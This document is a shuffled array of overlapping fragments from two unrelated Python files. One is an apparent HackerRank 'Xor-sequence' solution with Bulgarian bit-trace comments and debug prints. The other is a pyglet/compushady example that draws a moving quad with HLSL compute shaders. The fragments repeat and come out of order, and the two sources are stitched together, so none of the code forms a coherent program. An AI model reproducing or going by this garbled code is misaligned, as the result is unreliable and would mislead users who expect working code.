"def count_ones(n, bit_id): ones_in_group = 2**bit_id group_size = ones_in_group * 2 num_groups =",
"(l, r) in enumerate(zip(l_bits, r_bits)): if (r - l) % 2 != 0:",
"xor_sequence_2(l, r): result = 0 for i in range(l + 1, r +",
"enumerate(zip(l_bits, r_bits)): l //= 2 r //= 2 if (r - l) %",
"def get_bit_vector_ones_counts(n, max_bit): ones_cnts = [] for i in range(0, max_bit + 1):",
"0: return A_n(r) ^ result return result def xor_sequence_3(l, r): l_bits = get_bit_vector_ones_counts(l",
"0 rem = (n + 1) % group_size if rem > group_size //",
"- 1, max_bit=MAX_BITS) r_bits = get_bit_vector_ones_counts(r, max_bit=MAX_BITS) result = 0 for i, (l,",
"6 10000 00000 0 - нула 01110 01110 14 - числото = числото",
"= count_ones(n, bit_id=i) ones_cnts.append(num_ones) return ones_cnts def A_n(n): n_bits = get_bit_vector_ones_counts(n, max_bit=MAX_BITS) result",
"r + 1, 2): result ^= i if (r - l + 1)",
"9 15 \"\"\" \"\"\" 11110 11110 30 - Числото 11100 00010 2 -",
"https://www.hackerrank.com/challenges/xor-se/problem Sample Input 0: 3 2 4 2 8 5 9 Sample Output",
"range(q): lr = input().split() l = int(lr[0]) r = int(lr[1]) result = xor_sequence_3(l,",
"ones_cnts.append(num_ones) return ones_cnts def A_n(n): n_bits = get_bit_vector_ones_counts(n, max_bit=MAX_BITS) result = 0 for",
"31 a_l = format(A_n(l), '04b') a_r = format(A_n(r), '04b') s = 0 for",
"(r - l) % 2 != 0: result += 2**i return result def",
"l_bits = get_bit_vector_ones_counts(l + 1, max_bit=MAX_BITS) r_bits = get_bit_vector_ones_counts(r, max_bit=MAX_BITS) result = 0",
"i, (l, r) in enumerate(zip(l_bits, r_bits)): l //= 2 r //= 2 if",
"max_bit + 1): num_ones = count_ones(n, bit_id=i) ones_cnts.append(num_ones) return ones_cnts def A_n(n): n_bits",
"две 10010 10000 16 - числото = числото - 6 10000 00000 0",
"max_bit): ones_cnts = [] for i in range(0, max_bit + 1): num_ones =",
"+= 2**i return result def xor_sequence_2(l, r): result = 0 for i in",
"if (r - l + 1) % 2 != 0: return A_n(r) ^",
"(отговор) \"\"\" import math import os import random import re import sys MAX_BITS",
"'05b') sf = format(s, '05b') print(j, jf, sf, s) if (l - r",
"get_bit_vector_ones_counts(l + 1, max_bit=MAX_BITS) r_bits = get_bit_vector_ones_counts(r, max_bit=MAX_BITS) result = 0 for i,",
"+= 2**i return result def xor_sequence(l, r): l_bits = get_bit_vector_ones_counts(l - 1, max_bit=MAX_BITS)",
"0 - нула 10110 10110 22 - числото = числото - 2 10100",
"in range(l + 1, r + 1, 2): result ^= i if (r",
"2 != 0: al = A_n(l) s ^= al print(j, jf, sf, s)",
"re import sys MAX_BITS = 17 def count_ones(n, bit_id): ones_in_group = 2**bit_id group_size",
"for i in range(0, max_bit + 1): num_ones = count_ones(n, bit_id=i) ones_cnts.append(num_ones) return",
"jf, sf, s) if (l - r + 1) % 2 != 0:",
"result = 0 for i, (l, r) in enumerate(zip(l_bits, r_bits)): l //= 2",
"in range(r, l, -2): s ^= j jf = format(j, '05b') sf =",
"result if __name__ == '__main__': fptr = open(os.environ['OUTPUT_PATH'], 'w') q = int(input()) l,",
"open(os.environ['OUTPUT_PATH'], 'w') q = int(input()) l, r = 2, 31 a_l = format(A_n(l),",
"1): num_ones = count_ones(n, bit_id=i) ones_cnts.append(num_ones) return ones_cnts def A_n(n): n_bits = get_bit_vector_ones_counts(n,",
"2**i return result if __name__ == '__main__': fptr = open(os.environ['OUTPUT_PATH'], 'w') q =",
"!= 0: return A_n(r) ^ result return result def xor_sequence_3(l, r): l_bits =",
"xor_sequence(l, r): l_bits = get_bit_vector_ones_counts(l - 1, max_bit=MAX_BITS) r_bits = get_bit_vector_ones_counts(r, max_bit=MAX_BITS) result",
"00000 0 - нула 00110 00110 6 - числото = числото - 2",
"= числото - 2 10100 00010 2 - две 10010 10000 16 -",
"'w') q = int(input()) l, r = 2, 31 a_l = format(A_n(l), '04b')",
"2**i return result def xor_sequence_2(l, r): result = 0 for i in range(l",
"две (отговор) \"\"\" import math import os import random import re import sys",
"num_ones = count_ones(n, bit_id=i) ones_cnts.append(num_ones) return ones_cnts def A_n(n): n_bits = get_bit_vector_ones_counts(n, max_bit=MAX_BITS)",
"- числото = числото - 2 00100 00010 2 - две (отговор) \"\"\"",
"% 2 != 0: result += 2**i return result def xor_sequence_2(l, r): result",
"result += 2**i return result def xor_sequence(l, r): l_bits = get_bit_vector_ones_counts(l - 1,",
"0 for i, num_ones in enumerate(n_bits): if num_ones % 2 != 0: result",
"get_bit_vector_ones_counts(n, max_bit=MAX_BITS) result = 0 for i, num_ones in enumerate(n_bits): if num_ones %",
"== '__main__': fptr = open(os.environ['OUTPUT_PATH'], 'w') q = int(input()) l, r = 2,",
"01000 8 - числото = числото - 6 01000 00000 0 - нула",
"l, -2): s ^= j jf = format(j, '05b') sf = format(s, '05b')",
"0 - нула 01110 01110 14 - числото = числото - 2 01100",
"5 9 Sample Output 0: 7 9 15 \"\"\" \"\"\" 11110 11110 30",
"Output 0: 7 9 15 \"\"\" \"\"\" 11110 11110 30 - Числото 11100",
"MAX_BITS = 17 def count_ones(n, bit_id): ones_in_group = 2**bit_id group_size = ones_in_group *",
"2 - две 11010 11000 24 - числото = числото - 6 11000",
"11100 00010 2 - две 11010 11000 24 - числото = числото -",
"2 00100 00010 2 - две (отговор) \"\"\" import math import os import",
"30 - Числото 11100 00010 2 - две 11010 11000 24 - числото",
"j jf = format(j, '05b') sf = format(s, '05b') print(j, jf, sf, s)",
"n_bits = get_bit_vector_ones_counts(n, max_bit=MAX_BITS) result = 0 for i, num_ones in enumerate(n_bits): if",
"rem > group_size // 2: rem_ones = rem - group_size // 2 return",
"+ 1) // group_size ones_in_groups = num_groups * ones_in_group rem_ones = 0 rem",
"две 11010 11000 24 - числото = числото - 6 11000 00000 0",
"2: rem_ones = rem - group_size // 2 return ones_in_groups + rem_ones def",
"group_size // 2 return ones_in_groups + rem_ones def get_bit_vector_ones_counts(n, max_bit): ones_cnts = []",
"result += 2**i return result if __name__ == '__main__': fptr = open(os.environ['OUTPUT_PATH'], 'w')",
"sys MAX_BITS = 17 def count_ones(n, bit_id): ones_in_group = 2**bit_id group_size = ones_in_group",
"int(input()) l, r = 2, 31 a_l = format(A_n(l), '04b') a_r = format(A_n(r),",
"result = 0 for i in range(l + 1, r + 1, 2):",
"00010 2 - две (отговор) \"\"\" import math import os import random import",
"count_ones(n, bit_id): ones_in_group = 2**bit_id group_size = ones_in_group * 2 num_groups = (n",
"SRC - https://www.hackerrank.com/challenges/xor-se/problem Sample Input 0: 3 2 4 2 8 5 9",
"//= 2 r //= 2 if (r - l) % 2 != 0:",
"= числото - 6 10000 00000 0 - нула 01110 01110 14 -",
"group_size = ones_in_group * 2 num_groups = (n + 1) // group_size ones_in_groups",
"rem_ones = 0 rem = (n + 1) % group_size if rem >",
"числото - 6 11000 00000 0 - нула 10110 10110 22 - числото",
"= ones_in_group * 2 num_groups = (n + 1) // group_size ones_in_groups =",
"rem_ones def get_bit_vector_ones_counts(n, max_bit): ones_cnts = [] for i in range(0, max_bit +",
"= open(os.environ['OUTPUT_PATH'], 'w') q = int(input()) l, r = 2, 31 a_l =",
"ones_in_group = 2**bit_id group_size = ones_in_group * 2 num_groups = (n + 1)",
"num_groups * ones_in_group rem_ones = 0 rem = (n + 1) % group_size",
"'__main__': fptr = open(os.environ['OUTPUT_PATH'], 'w') q = int(input()) l, r = 2, 31",
"2 8 5 9 Sample Output 0: 7 9 15 \"\"\" \"\"\" 11110",
"числото = числото - 6 10000 00000 0 - нула 01110 01110 14",
"числото - 2 10100 00010 2 - две 10010 10000 16 - числото",
"> group_size // 2: rem_ones = rem - group_size // 2 return ones_in_groups",
"числото - 2 00100 00010 2 - две (отговор) \"\"\" import math import",
"числото = числото - 2 01100 00010 2 - две 01010 01000 8",
"= числото - 2 00100 00010 2 - две (отговор) \"\"\" import math",
"- group_size // 2 return ones_in_groups + rem_ones def get_bit_vector_ones_counts(n, max_bit): ones_cnts =",
"print(j, jf, sf, s) for q_itr in range(q): lr = input().split() l =",
"1, r + 1, 2): result ^= i if (r - l +",
"11000 00000 0 - нула 10110 10110 22 - числото = числото -",
"def xor_sequence_2(l, r): result = 0 for i in range(l + 1, r",
"00010 2 - две 11010 11000 24 - числото = числото - 6",
"7 9 15 \"\"\" \"\"\" 11110 11110 30 - Числото 11100 00010 2",
"num_ones % 2 != 0: result += 2**i return result def xor_sequence(l, r):",
"= (n + 1) // group_size ones_in_groups = num_groups * ones_in_group rem_ones =",
"math import os import random import re import sys MAX_BITS = 17 def",
"num_ones in enumerate(n_bits): if num_ones % 2 != 0: result += 2**i return",
"'05b') print(j, jf, sf, s) if (l - r + 1) % 2",
"- числото = числото - 6 11000 00000 0 - нула 10110 10110",
"11000 24 - числото = числото - 6 11000 00000 0 - нула",
"\"\"\" \"\"\" 11110 11110 30 - Числото 11100 00010 2 - две 11010",
"\"\"\" Xor-sequence SRC - https://www.hackerrank.com/challenges/xor-se/problem Sample Input 0: 3 2 4 2 8",
"ones_in_groups = num_groups * ones_in_group rem_ones = 0 rem = (n + 1)",
"2 r //= 2 if (r - l) % 2 != 0: result",
"al = A_n(l) s ^= al print(j, jf, sf, s) for q_itr in",
"+ 1) % group_size if rem > group_size // 2: rem_ones = rem",
"result ^= i if (r - l + 1) % 2 != 0:",
"= 0 for i, (l, r) in enumerate(zip(l_bits, r_bits)): if (r - l)",
"format(j, '05b') sf = format(s, '05b') print(j, jf, sf, s) if (l -",
"result def xor_sequence(l, r): l_bits = get_bit_vector_ones_counts(l - 1, max_bit=MAX_BITS) r_bits = get_bit_vector_ones_counts(r,",
"(r - l + 1) % 2 != 0: return A_n(r) ^ result",
"- l + 1) % 2 != 0: return A_n(r) ^ result return",
"22 - числото = числото - 2 10100 00010 2 - две 10010",
"i in range(0, max_bit + 1): num_ones = count_ones(n, bit_id=i) ones_cnts.append(num_ones) return ones_cnts",
"max_bit=MAX_BITS) result = 0 for i, num_ones in enumerate(n_bits): if num_ones % 2",
"get_bit_vector_ones_counts(n, max_bit): ones_cnts = [] for i in range(0, max_bit + 1): num_ones",
"- две 10010 10000 16 - числото = числото - 6 10000 00000",
"00110 6 - числото = числото - 2 00100 00010 2 - две",
"0: result += 2**i return result def xor_sequence(l, r): l_bits = get_bit_vector_ones_counts(l -",
"for i in range(l + 1, r + 1, 2): result ^= i",
"- числото = числото - 6 10000 00000 0 - нула 01110 01110",
"= int(input()) l, r = 2, 31 a_l = format(A_n(l), '04b') a_r =",
"% 2 != 0: result += 2**i return result def xor_sequence(l, r): l_bits",
"11110 11110 30 - Числото 11100 00010 2 - две 11010 11000 24",
"return A_n(r) ^ result return result def xor_sequence_3(l, r): l_bits = get_bit_vector_ones_counts(l +",
"result = 0 for i, num_ones in enumerate(n_bits): if num_ones % 2 !=",
"= 2**bit_id group_size = ones_in_group * 2 num_groups = (n + 1) //",
"input().split() l = int(lr[0]) r = int(lr[1]) result = xor_sequence_3(l, r) fptr.write(str(result) +",
"enumerate(zip(l_bits, r_bits)): if (r - l) % 2 != 0: result += 2**i",
"2 num_groups = (n + 1) // group_size ones_in_groups = num_groups * ones_in_group",
"sf = format(s, '05b') print(j, jf, sf, s) if (l - r +",
"Sample Input 0: 3 2 4 2 8 5 9 Sample Output 0:",
"0 for i, (l, r) in enumerate(zip(l_bits, r_bits)): if (r - l) %",
"^= j jf = format(j, '05b') sf = format(s, '05b') print(j, jf, sf,",
"% 2 != 0: al = A_n(l) s ^= al print(j, jf, sf,",
"- нула 10110 10110 22 - числото = числото - 2 10100 00010",
"def xor_sequence_3(l, r): l_bits = get_bit_vector_ones_counts(l + 1, max_bit=MAX_BITS) r_bits = get_bit_vector_ones_counts(r, max_bit=MAX_BITS)",
"rem = (n + 1) % group_size if rem > group_size // 2:",
"if rem > group_size // 2: rem_ones = rem - group_size // 2",
"- Числото 11100 00010 2 - две 11010 11000 24 - числото =",
"15 \"\"\" \"\"\" 11110 11110 30 - Числото 11100 00010 2 - две",
"+ 1, 2): result ^= i if (r - l + 1) %",
"00010 2 - две 10010 10000 16 - числото = числото - 6",
"i, num_ones in enumerate(n_bits): if num_ones % 2 != 0: result += 2**i",
"r //= 2 if (r - l) % 2 != 0: result +=",
"a_r = format(A_n(r), '04b') s = 0 for j in range(r, l, -2):",
"ones_in_group * 2 num_groups = (n + 1) // group_size ones_in_groups = num_groups",
"- нула 01110 01110 14 - числото = числото - 2 01100 00010",
"return result def xor_sequence(l, r): l_bits = get_bit_vector_ones_counts(l - 1, max_bit=MAX_BITS) r_bits =",
"r + 1) % 2 != 0: al = A_n(l) s ^= al",
"!= 0: result += 2**i return result if __name__ == '__main__': fptr =",
"s ^= al print(j, jf, sf, s) for q_itr in range(q): lr =",
"ones_in_group rem_ones = 0 rem = (n + 1) % group_size if rem",
"+ 1) % 2 != 0: al = A_n(l) s ^= al print(j,",
"+ 1, max_bit=MAX_BITS) r_bits = get_bit_vector_ones_counts(r, max_bit=MAX_BITS) result = 0 for i, (l,",
"return result if __name__ == '__main__': fptr = open(os.environ['OUTPUT_PATH'], 'w') q = int(input())",
"= format(s, '05b') print(j, jf, sf, s) if (l - r + 1)",
"00000 0 - нула 01110 01110 14 - числото = числото - 2",
"2 if (r - l) % 2 != 0: result += 2**i return",
"result return result def xor_sequence_3(l, r): l_bits = get_bit_vector_ones_counts(l + 1, max_bit=MAX_BITS) r_bits",
"result = 0 for i, (l, r) in enumerate(zip(l_bits, r_bits)): if (r -",
"max_bit=MAX_BITS) result = 0 for i, (l, r) in enumerate(zip(l_bits, r_bits)): l //=",
"!= 0: al = A_n(l) s ^= al print(j, jf, sf, s) for",
"= format(j, '05b') sf = format(s, '05b') print(j, jf, sf, s) if (l",
"i in range(l + 1, r + 1, 2): result ^= i if",
"= 0 for i, (l, r) in enumerate(zip(l_bits, r_bits)): l //= 2 r",
"2, 31 a_l = format(A_n(l), '04b') a_r = format(A_n(r), '04b') s = 0",
"00000 0 - нула 10110 10110 22 - числото = числото - 2",
"* 2 num_groups = (n + 1) // group_size ones_in_groups = num_groups *",
"1, max_bit=MAX_BITS) r_bits = get_bit_vector_ones_counts(r, max_bit=MAX_BITS) result = 0 for i, (l, r)",
"!= 0: result += 2**i return result def xor_sequence_2(l, r): result = 0",
"нула 10110 10110 22 - числото = числото - 2 10100 00010 2",
"ones_cnts = [] for i in range(0, max_bit + 1): num_ones = count_ones(n,",
"= num_groups * ones_in_group rem_ones = 0 rem = (n + 1) %",
"2): result ^= i if (r - l + 1) % 2 !=",
"r): l_bits = get_bit_vector_ones_counts(l - 1, max_bit=MAX_BITS) r_bits = get_bit_vector_ones_counts(r, max_bit=MAX_BITS) result =",
"6 11000 00000 0 - нула 10110 10110 22 - числото = числото",
"01100 00010 2 - две 01010 01000 8 - числото = числото -",
"for i, (l, r) in enumerate(zip(l_bits, r_bits)): l //= 2 r //= 2",
"l = int(lr[0]) r = int(lr[1]) result = xor_sequence_3(l, r) fptr.write(str(result) + '\\n')",
"- r + 1) % 2 != 0: al = A_n(l) s ^=",
"16 - числото = числото - 6 10000 00000 0 - нула 01110",
"= 0 for i, num_ones in enumerate(n_bits): if num_ones % 2 != 0:",
"for j in range(r, l, -2): s ^= j jf = format(j, '05b')",
"import re import sys MAX_BITS = 17 def count_ones(n, bit_id): ones_in_group = 2**bit_id",
"fptr = open(os.environ['OUTPUT_PATH'], 'w') q = int(input()) l, r = 2, 31 a_l",
"2 - две 10010 10000 16 - числото = числото - 6 10000",
"10000 16 - числото = числото - 6 10000 00000 0 - нула",
"random import re import sys MAX_BITS = 17 def count_ones(n, bit_id): ones_in_group =",
"2**bit_id group_size = ones_in_group * 2 num_groups = (n + 1) // group_size",
"0: result += 2**i return result def xor_sequence_2(l, r): result = 0 for",
"'04b') s = 0 for j in range(r, l, -2): s ^= j",
"ones_cnts def A_n(n): n_bits = get_bit_vector_ones_counts(n, max_bit=MAX_BITS) result = 0 for i, num_ones",
"= [] for i in range(0, max_bit + 1): num_ones = count_ones(n, bit_id=i)",
"sf, s) if (l - r + 1) % 2 != 0: al",
"= get_bit_vector_ones_counts(n, max_bit=MAX_BITS) result = 0 for i, num_ones in enumerate(n_bits): if num_ones",
"= 0 rem = (n + 1) % group_size if rem > group_size",
"2 4 2 8 5 9 Sample Output 0: 7 9 15 \"\"\"",
"+= 2**i return result if __name__ == '__main__': fptr = open(os.environ['OUTPUT_PATH'], 'w') q",
"6 - числото = числото - 2 00100 00010 2 - две (отговор)",
"enumerate(n_bits): if num_ones % 2 != 0: result += 2**i return result def",
"i if (r - l + 1) % 2 != 0: return A_n(r)",
"= числото - 2 01100 00010 2 - две 01010 01000 8 -",
"4 2 8 5 9 Sample Output 0: 7 9 15 \"\"\" \"\"\"",
"= 0 for j in range(r, l, -2): s ^= j jf =",
"import sys MAX_BITS = 17 def count_ones(n, bit_id): ones_in_group = 2**bit_id group_size =",
"s = 0 for j in range(r, l, -2): s ^= j jf",
"= 0 for i in range(l + 1, r + 1, 2): result",
"def A_n(n): n_bits = get_bit_vector_ones_counts(n, max_bit=MAX_BITS) result = 0 for i, num_ones in",
"^ result return result def xor_sequence_3(l, r): l_bits = get_bit_vector_ones_counts(l + 1, max_bit=MAX_BITS)",
"- числото = числото - 6 01000 00000 0 - нула 00110 00110",
"- 6 01000 00000 0 - нула 00110 00110 6 - числото =",
"os import random import re import sys MAX_BITS = 17 def count_ones(n, bit_id):",
"+ 1, r + 1, 2): result ^= i if (r - l",
"range(r, l, -2): s ^= j jf = format(j, '05b') sf = format(s,",
"A_n(l) s ^= al print(j, jf, sf, s) for q_itr in range(q): lr",
"count_ones(n, bit_id=i) ones_cnts.append(num_ones) return ones_cnts def A_n(n): n_bits = get_bit_vector_ones_counts(n, max_bit=MAX_BITS) result =",
"return result def xor_sequence_2(l, r): result = 0 for i in range(l +",
"числото - 6 10000 00000 0 - нула 01110 01110 14 - числото",
"l //= 2 r //= 2 if (r - l) % 2 !=",
"- 2 10100 00010 2 - две 10010 10000 16 - числото =",
"// 2: rem_ones = rem - group_size // 2 return ones_in_groups + rem_ones",
"s) if (l - r + 1) % 2 != 0: al =",
"17 def count_ones(n, bit_id): ones_in_group = 2**bit_id group_size = ones_in_group * 2 num_groups",
"две 01010 01000 8 - числото = числото - 6 01000 00000 0",
"01110 14 - числото = числото - 2 01100 00010 2 - две",
"s ^= j jf = format(j, '05b') sf = format(s, '05b') print(j, jf,",
"= числото - 6 11000 00000 0 - нула 10110 10110 22 -",
"- 2 00100 00010 2 - две (отговор) \"\"\" import math import os",
"- две 11010 11000 24 - числото = числото - 6 11000 00000",
"2 != 0: result += 2**i return result if __name__ == '__main__': fptr",
"sf, s) for q_itr in range(q): lr = input().split() l = int(lr[0]) r",
"s) for q_itr in range(q): lr = input().split() l = int(lr[0]) r =",
"l, r = 2, 31 a_l = format(A_n(l), '04b') a_r = format(A_n(r), '04b')",
"i, (l, r) in enumerate(zip(l_bits, r_bits)): if (r - l) % 2 !=",
"for i, num_ones in enumerate(n_bits): if num_ones % 2 != 0: result +=",
"- нула 00110 00110 6 - числото = числото - 2 00100 00010",
"format(A_n(r), '04b') s = 0 for j in range(r, l, -2): s ^=",
"числото = числото - 2 10100 00010 2 - две 10010 10000 16",
"- 2 01100 00010 2 - две 01010 01000 8 - числото =",
"al print(j, jf, sf, s) for q_itr in range(q): lr = input().split() l",
"числото = числото - 6 11000 00000 0 - нула 10110 10110 22",
"2 != 0: result += 2**i return result def xor_sequence(l, r): l_bits =",
"Input 0: 3 2 4 2 8 5 9 Sample Output 0: 7",
"return ones_cnts def A_n(n): n_bits = get_bit_vector_ones_counts(n, max_bit=MAX_BITS) result = 0 for i,",
"2 - две 01010 01000 8 - числото = числото - 6 01000",
"A_n(r) ^ result return result def xor_sequence_3(l, r): l_bits = get_bit_vector_ones_counts(l + 1,",
"<reponame>ichko/DataStructures #!/bin/python3 \"\"\" Xor-sequence SRC - https://www.hackerrank.com/challenges/xor-se/problem Sample Input 0: 3 2 4",
"8 - числото = числото - 6 01000 00000 0 - нула 00110",
"= rem - group_size // 2 return ones_in_groups + rem_ones def get_bit_vector_ones_counts(n, max_bit):",
"get_bit_vector_ones_counts(l - 1, max_bit=MAX_BITS) r_bits = get_bit_vector_ones_counts(r, max_bit=MAX_BITS) result = 0 for i,",
"lr = input().split() l = int(lr[0]) r = int(lr[1]) result = xor_sequence_3(l, r)",
"1, 2): result ^= i if (r - l + 1) % 2",
"^= i if (r - l + 1) % 2 != 0: return",
"- две (отговор) \"\"\" import math import os import random import re import",
"10110 22 - числото = числото - 2 10100 00010 2 - две",
"in enumerate(n_bits): if num_ones % 2 != 0: result += 2**i return result",
"A_n(n): n_bits = get_bit_vector_ones_counts(n, max_bit=MAX_BITS) result = 0 for i, num_ones in enumerate(n_bits):",
"result def xor_sequence_3(l, r): l_bits = get_bit_vector_ones_counts(l + 1, max_bit=MAX_BITS) r_bits = get_bit_vector_ones_counts(r,",
"[] for i in range(0, max_bit + 1): num_ones = count_ones(n, bit_id=i) ones_cnts.append(num_ones)",
"0: 3 2 4 2 8 5 9 Sample Output 0: 7 9",
"r_bits)): if (r - l) % 2 != 0: result += 2**i return",
"r): l_bits = get_bit_vector_ones_counts(l + 1, max_bit=MAX_BITS) r_bits = get_bit_vector_ones_counts(r, max_bit=MAX_BITS) result ="
] |
[
"+ uint2(quad.x, quad.y)] = float4(0, 1, 1, 1); } \"\"\"), cbv=[constant_buffer], uav=[target]) x",
"tid : SV_DispatchThreadID) { target[tid.xy] = float4(1, 0, 0, 1); } \"\"\"), uav=[target])",
"compushady.shaders import hlsl if platform.system() != 'Windows': raise Exception('only Windows is supported for",
"Quad { uint x; uint y; }; ConstantBuffer<Quad> quad : register(b0); RWTexture2D<float4> target",
"import ctypes from compushady import HEAP_UPLOAD, Swapchain, Compute, Texture2D, Buffer from compushady.formats import",
"{ target[tid.xy + uint2(quad.x, quad.y)] = float4(0, 1, 1, 1); } \"\"\"), cbv=[constant_buffer],",
"HEAP_UPLOAD, Swapchain, Compute, Texture2D, Buffer from compushady.formats import B8G8R8A8_UNORM from compushady.shaders import hlsl",
"example') window = pyglet.window.Window() swapchain = Swapchain(window._hwnd, B8G8R8A8_UNORM, 3) target = Texture2D(window.width, window.height,",
"Buffer(8, HEAP_UPLOAD) quad = Compute(hlsl.compile(\"\"\" struct Quad { uint x; uint y; };",
"uav=[target]) constant_buffer = Buffer(8, HEAP_UPLOAD) quad = Compute(hlsl.compile(\"\"\" struct Quad { uint x;",
"\"\"\"), uav=[target]) constant_buffer = Buffer(8, HEAP_UPLOAD) quad = Compute(hlsl.compile(\"\"\" struct Quad { uint",
"[numthreads(8,8,1)] void main(uint3 tid : SV_DispatchThreadID) { target[tid.xy] = float4(1, 0, 0, 1);",
"= 0 if y > window.height: y = 0 constant_buffer.upload(struct.pack('II', x, y)) @window.event",
"0 def update(dt): global x, y x += 1 y += 1 if",
"def on_draw(): clear_screen.dispatch(window.width // 8, window.height // 8, 1) quad.dispatch(1, 1, 1) swapchain.present(target)",
"+= 1 y += 1 if x > window.width: x = 0 if",
"quad.y)] = float4(0, 1, 1, 1); } \"\"\"), cbv=[constant_buffer], uav=[target]) x = 0",
"import HEAP_UPLOAD, Swapchain, Compute, Texture2D, Buffer from compushady.formats import B8G8R8A8_UNORM from compushady.shaders import",
"x = 0 y = 0 def update(dt): global x, y x +=",
"this example') window = pyglet.window.Window() swapchain = Swapchain(window._hwnd, B8G8R8A8_UNORM, 3) target = Texture2D(window.width,",
"0 y = 0 def update(dt): global x, y x += 1 y",
"compushady.formats import B8G8R8A8_UNORM from compushady.shaders import hlsl if platform.system() != 'Windows': raise Exception('only",
"on_draw(): clear_screen.dispatch(window.width // 8, window.height // 8, 1) quad.dispatch(1, 1, 1) swapchain.present(target) pyglet.clock.schedule_interval(update,",
"1); } \"\"\"), cbv=[constant_buffer], uav=[target]) x = 0 y = 0 def update(dt):",
"pyglet.window.Window() swapchain = Swapchain(window._hwnd, B8G8R8A8_UNORM, 3) target = Texture2D(window.width, window.height, B8G8R8A8_UNORM) clear_screen =",
"x += 1 y += 1 if x > window.width: x = 0",
"struct from ctypes import addressof,pointer import ctypes from compushady import HEAP_UPLOAD, Swapchain, Compute,",
"swapchain = Swapchain(window._hwnd, B8G8R8A8_UNORM, 3) target = Texture2D(window.width, window.height, B8G8R8A8_UNORM) clear_screen = Compute(hlsl.compile(\"\"\"",
"Exception('only Windows is supported for this example') window = pyglet.window.Window() swapchain = Swapchain(window._hwnd,",
"// 8, window.height // 8, 1) quad.dispatch(1, 1, 1) swapchain.present(target) pyglet.clock.schedule_interval(update, 1/120.0) pyglet.app.run()",
"B8G8R8A8_UNORM) clear_screen = Compute(hlsl.compile(\"\"\" RWTexture2D<float4> target : register(u0); [numthreads(8,8,1)] void main(uint3 tid :",
"from compushady.formats import B8G8R8A8_UNORM from compushady.shaders import hlsl if platform.system() != 'Windows': raise",
"> window.height: y = 0 constant_buffer.upload(struct.pack('II', x, y)) @window.event def on_draw(): clear_screen.dispatch(window.width //",
"tid : SV_DispatchThreadID) { target[tid.xy + uint2(quad.x, quad.y)] = float4(0, 1, 1, 1);",
"Swapchain, Compute, Texture2D, Buffer from compushady.formats import B8G8R8A8_UNORM from compushady.shaders import hlsl if",
"} \"\"\"), cbv=[constant_buffer], uav=[target]) x = 0 y = 0 def update(dt): global",
"uint2(quad.x, quad.y)] = float4(0, 1, 1, 1); } \"\"\"), cbv=[constant_buffer], uav=[target]) x =",
"= Buffer(8, HEAP_UPLOAD) quad = Compute(hlsl.compile(\"\"\" struct Quad { uint x; uint y;",
"SV_DispatchThreadID) { target[tid.xy] = float4(1, 0, 0, 1); } \"\"\"), uav=[target]) constant_buffer =",
"= float4(1, 0, 0, 1); } \"\"\"), uav=[target]) constant_buffer = Buffer(8, HEAP_UPLOAD) quad",
"import struct from ctypes import addressof,pointer import ctypes from compushady import HEAP_UPLOAD, Swapchain,",
"!= 'Windows': raise Exception('only Windows is supported for this example') window = pyglet.window.Window()",
"import pyglet import platform import struct from ctypes import addressof,pointer import ctypes from",
"0 constant_buffer.upload(struct.pack('II', x, y)) @window.event def on_draw(): clear_screen.dispatch(window.width // 8, window.height // 8,",
"= Swapchain(window._hwnd, B8G8R8A8_UNORM, 3) target = Texture2D(window.width, window.height, B8G8R8A8_UNORM) clear_screen = Compute(hlsl.compile(\"\"\" RWTexture2D<float4>",
"import addressof,pointer import ctypes from compushady import HEAP_UPLOAD, Swapchain, Compute, Texture2D, Buffer from",
"hlsl if platform.system() != 'Windows': raise Exception('only Windows is supported for this example')",
"target : register(u0); [numthreads(8,8,1)] void main(uint3 tid : SV_DispatchThreadID) { target[tid.xy + uint2(quad.x,",
"ctypes from compushady import HEAP_UPLOAD, Swapchain, Compute, Texture2D, Buffer from compushady.formats import B8G8R8A8_UNORM",
"uint y; }; ConstantBuffer<Quad> quad : register(b0); RWTexture2D<float4> target : register(u0); [numthreads(8,8,1)] void",
"Compute(hlsl.compile(\"\"\" struct Quad { uint x; uint y; }; ConstantBuffer<Quad> quad : register(b0);",
"import B8G8R8A8_UNORM from compushady.shaders import hlsl if platform.system() != 'Windows': raise Exception('only Windows",
"target[tid.xy] = float4(1, 0, 0, 1); } \"\"\"), uav=[target]) constant_buffer = Buffer(8, HEAP_UPLOAD)",
"y; }; ConstantBuffer<Quad> quad : register(b0); RWTexture2D<float4> target : register(u0); [numthreads(8,8,1)] void main(uint3",
"1 if x > window.width: x = 0 if y > window.height: y",
"constant_buffer = Buffer(8, HEAP_UPLOAD) quad = Compute(hlsl.compile(\"\"\" struct Quad { uint x; uint",
"x = 0 if y > window.height: y = 0 constant_buffer.upload(struct.pack('II', x, y))",
"+= 1 if x > window.width: x = 0 if y > window.height:",
"if y > window.height: y = 0 constant_buffer.upload(struct.pack('II', x, y)) @window.event def on_draw():",
"y > window.height: y = 0 constant_buffer.upload(struct.pack('II', x, y)) @window.event def on_draw(): clear_screen.dispatch(window.width",
"Texture2D, Buffer from compushady.formats import B8G8R8A8_UNORM from compushady.shaders import hlsl if platform.system() !=",
"from ctypes import addressof,pointer import ctypes from compushady import HEAP_UPLOAD, Swapchain, Compute, Texture2D,",
"if platform.system() != 'Windows': raise Exception('only Windows is supported for this example') window",
": register(b0); RWTexture2D<float4> target : register(u0); [numthreads(8,8,1)] void main(uint3 tid : SV_DispatchThreadID) {",
"1); } \"\"\"), uav=[target]) constant_buffer = Buffer(8, HEAP_UPLOAD) quad = Compute(hlsl.compile(\"\"\" struct Quad",
"= Compute(hlsl.compile(\"\"\" RWTexture2D<float4> target : register(u0); [numthreads(8,8,1)] void main(uint3 tid : SV_DispatchThreadID) {",
"RWTexture2D<float4> target : register(u0); [numthreads(8,8,1)] void main(uint3 tid : SV_DispatchThreadID) { target[tid.xy] =",
"target : register(u0); [numthreads(8,8,1)] void main(uint3 tid : SV_DispatchThreadID) { target[tid.xy] = float4(1,",
"register(u0); [numthreads(8,8,1)] void main(uint3 tid : SV_DispatchThreadID) { target[tid.xy] = float4(1, 0, 0,",
"register(u0); [numthreads(8,8,1)] void main(uint3 tid : SV_DispatchThreadID) { target[tid.xy + uint2(quad.x, quad.y)] =",
"import platform import struct from ctypes import addressof,pointer import ctypes from compushady import",
"B8G8R8A8_UNORM, 3) target = Texture2D(window.width, window.height, B8G8R8A8_UNORM) clear_screen = Compute(hlsl.compile(\"\"\" RWTexture2D<float4> target :",
"0, 1); } \"\"\"), uav=[target]) constant_buffer = Buffer(8, HEAP_UPLOAD) quad = Compute(hlsl.compile(\"\"\" struct",
